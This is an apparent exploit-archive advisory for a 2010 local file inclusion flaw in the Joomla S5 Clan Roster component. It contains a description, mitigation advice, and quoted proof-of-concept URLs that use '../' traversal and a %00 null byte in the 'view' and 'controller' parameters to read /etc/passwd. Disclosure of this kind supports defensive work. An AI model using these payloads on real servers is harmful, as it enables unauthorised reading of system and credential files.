Joomla Component S5 Clan Roster Local File Inclusion Vulnerability

vendor:

com_s5clanroster

by:

AntiSecurity

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: com_s5clanroster

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component S5 Clan Roster Local File Inclusion Vulnerability

A vulnerability in the Joomla Component S5 Clan Roster allows an attacker to include local files on the server. This is done by sending a specially crafted HTTP request to the vulnerable server containing directory traversal sequences (e.g. '../') and a URL-encoded null byte (%00) at the end of the request. This allows the attacker to read any file on the server that the web server process has access to.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated. Additionally, the web server should be configured to deny requests containing directory traversal sequences.

Source

Exploit-DB raw data:

==================================================================================================================


  [o] Joomla Component S5 Clan Roster Local File Inclusion Vulnerability
 
       Software : com_s5clanroster
       Vendor   : http://www.shape5.com
       Author   : AntiSecurity [ s4va Vrs-hCk NoGe OoN_BoY Paman zxvf ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


==================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_s5clanroster&view=[LFI]
       http://localhost/[path]/index.php?option=com_s5clanroster&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_s5clanroster&view=../../../../../../../../../../etc/passwd%00
       http://localhost/index.php?option=com_s5clanroster&controller=../../../../../../../../../../etc/passwd%00


==================================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11


==================================================================================================================


  [o] April 14 2010 - GMT +07:00 Jakarta, Indonesia